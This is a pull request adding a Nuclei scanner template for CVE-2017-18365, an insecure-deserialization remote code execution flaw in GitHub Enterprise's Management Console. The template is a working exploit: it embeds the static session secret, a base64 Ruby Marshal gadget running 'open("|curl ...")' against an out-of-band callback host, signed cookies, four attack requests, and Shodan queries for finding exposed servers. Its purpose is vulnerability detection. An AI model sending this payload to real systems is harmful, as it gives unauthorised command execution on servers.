### PR TITLE
Add CVE-2017-18365 GitHub Enterprise Insecure Deserialization RCE

### DIFF
--- a/http/cves/2017/CVE-2017-18365.yaml
+++ b/http/cves/2017/CVE-2017-18365.yaml
@@ -1,0 +1,119 @@
+id: CVE-2017-18365
+
+info:
+  name: GitHub Enterprise < 2.8.7 - Management Console RCE via Insecure Deserialization
+  author: Dxrshn
+  severity: critical
+  description: |
+    GitHub Enterprise 2.8.x before 2.8.7 contains an insecure deserialization vulnerability caused by a static enterprise session secret (641dd6454584ddabfed6342cc66281fb) in the Management Console. The Management Console (accessible on ports 8080/8443) uses Ruby's Marshal.load to deserialize session cookies. Unauthenticated attackers can execute arbitrary code by crafting a signed cookie with the known secret key.
+  impact: |
+    An attacker can exploit this vulnerability to execute arbitrary commands on the GitHub Enterprise server, potentially leading to complete system compromise.
+  remediation: |
+    Upgrade GitHub Enterprise to version 2.8.7 or later.
+  reference:
+    - https://www.exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html
+    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/github_enterprise_secret.rb
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-18365
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2017-18365
+    cwe-id: CWE-502
+    epss-score: 0.97434
+    epss-percentile: 0.99968
+    cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
+  metadata:
+    verified: false
+    max-request: 4
+    vendor: github
+    product: enterprise_server
+    shodan-query:
+      - http.title:"Setup GitHub Enterprise"
+      - http.title:"GitHub Enterprise"
+      - http.title:"github debug"
+    fofa-query:
+      - title="Setup GitHub Enterprise"
+      - title="GitHub Enterprise"
+  tags: cve,cve2017,github,enterprise,rce,deserialization,oast,kev
+
+variables:
+  secret: "641dd6454584ddabfed6342cc66281fb"
+  oast: ".{{interactsh-url}}"
+  padded_oast: "{{padding(oast,'a',50,'prefix')}}"
+  old_code: "b3BlbigifGN1cmwgeHh4eC4yYmVyNzQyYXVyZ3BrN2Jpc3cxY3BodWg5OGZ6M3J5Zm4ub2FzdGlmeS5jb20iKQ=="
+  code1: 'open("|curl {{padded_oast}}")'
+  marshal_data: '{{base64(replace(base64_decode("BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgc6CUBzcmNJInhldmFsKCdiM0JsYmlnaWZHTjFjbXdnZUhoNGVDNHlZbVZ5TnpReVlYVnlaM0JyTjJKcGMzY3hZM0JvZFdnNU9HWjZNM0o1Wm00dWIyRnpkR2xtZVM1amIyMGlLUT09Jy51bnBhY2soJ20wJykuZmlyc3QpBjoGRVQ6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0"),old_code,base64(code1)))}}'
+  signature: "{{hmac('sha1', marshal_data, secret)}}"
+
+http:
+  - raw:
+      - |
+        GET /setup/api HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: _gh_manage={{urlencode(marshal_data)}}--{{signature}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(interactsh_protocol, 'dns')"
+
+    extractors:
+      - type: dsl
+        name: cookie_used
+        dsl:
+          - '"_gh_manage"'
+
+  - raw:
+      - |
+        GET /setup/api HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: _enterprise_manage={{urlencode(marshal_data)}}--{{signature}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(interactsh_protocol, 'dns')"
+
+    extractors:
+      - type: dsl
+        name: cookie_used
+        dsl:
+          - '"_enterprise_manage"'
+
+  - raw:
+      - |
+        GET /setup HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: _gh_manage={{urlencode(marshal_data)}}--{{signature}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(interactsh_protocol, 'dns')"
+
+    extractors:
+      - type: dsl
+        name: cookie_used
+        dsl:
+          - '"_gh_manage on /setup"'
+
+  - raw:
+      - |
+        GET /setup HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: _enterprise_manage={{urlencode(marshal_data)}}--{{signature}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(interactsh_protocol, 'dns')"
+
+    extractors:
+      - type: dsl
+        name: cookie_used
+        dsl:
+          - '"_enterprise_manage on /setup"'


### PR DESCRIPTION
### PR Information

- Added CVE-2017-18365 - GitHub Enterprise < 2.8.7 Management Console RCE via Insecure Deserialization
- References:
  - https://www.exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html
  - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/github_enterprise_secret.rb
  - https://nvd.nist.gov/vuln/detail/CVE-2017-18365

### Template validation

- [ ] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

**Template Mechanics Verified:**
- Ran `nuclei -debug` against test target
- Confirmed payload construction and request formatting works correctly
- All 4 cookie/endpoint combinations tested successfully

No test environment available (GitHub Enterprise 2.8.x is legacy paid software).

**Template is based on:**
1. Documented Metasploit exploit module (`github_enterprise_secret.rb`)
2. Original POC by exablue GmbH
3. Same Ruby Marshal deserialization pattern as existing template `infoblox-netmri-rails-cookie-rce.yaml`

**Shodan Query:** `http.title:"github debug"`

The template uses OAST (interactsh) to confirm code execution - not version-based detection.

/claim #14451

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
